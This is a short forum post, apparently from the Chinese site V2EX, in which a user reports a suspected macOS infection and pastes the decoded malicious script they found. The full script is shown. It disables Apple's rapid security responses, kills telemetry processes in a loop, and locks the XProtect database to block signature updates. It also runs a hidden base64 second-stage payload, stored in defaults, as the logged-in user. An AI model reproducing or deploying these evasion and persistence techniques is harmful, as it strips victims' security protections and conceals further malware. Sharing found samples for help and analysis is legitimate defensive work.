macOS 疑似中毒
找到的主脚本如下
defaults read fqijeu lqqr_djhxqjf | base64 --decode
via V2EX - 技术 (author: maxbug)
找到的主脚本如下
defaults read fqijeu lqqr_djhxqjf | base64 --decode
date
whoami
cd /Users/Shared
pwd
root_tasks() {
/usr/bin/defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist ConfigDataInstall -bool false
/usr/bin/defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist AllowRapidSecurityResponses -bool false
kill_processes() {
while true; do
pgrep -fi 'CloudTelemetryService' | xargs -r -I {} sh -c 'kill -9 {} && echo "killed PID {}"'
sleep 1
done
}
kill_processes &
perl -e 'open my $fh, "<", "/var/protected/xprotect/XPdb" or die $!; flock($fh, 2) or die $!; while (1) { sleep 60; }' &
echo "I am a root task $(whoami)"
}
network_tasks() {
while ! ping -c1 -W1 1.1.1.1 &> /dev/null ; do
echo 'no net'
sleep 5
done
echo 'net available'
"$1"
echo 'network task completed.'
}
localuser_tasks() {
while true; do
localuser=$(scutil <<< "show State:/Users/ConsoleUser" | awk '/Name :/ && ! /loginwindow/ { print $3 }')
if [[ -n "$localuser" ]]; then
break
fi
echo 'No logged-in user. Retrying...'
sleep 5
done
echo "[LOGGED IN] $localuser"
task() {
sleep 30
sudo -u "$localuser" /bin/bash <<EOF
defaults read 'fqijeu' 'burlh_dqeur_rkq' | base64 --decode | env SRC='Daemon' sh >/dev/null 2>&1 &
EOF
}
network_tasks task &
}
loop_tasks() {
echo 'Daemon is running...'
if [ -e "/Users/echo/.kill" ]; then
echo 'killing...'
grep -lir 'echo.*base64.*sh' /Library/LaunchDaemons/ 2>/dev/null | while read -r file; do
echo "$file"
rm -f "$file"
done
rm -f "/Users/echo/.kill"
echo 'killed.'
exit
fi
}
root_tasks &
localuser_tasks &
while true; do
loop_tasks &
sleep 60
done
via V2EX - 技术 (author: maxbug)
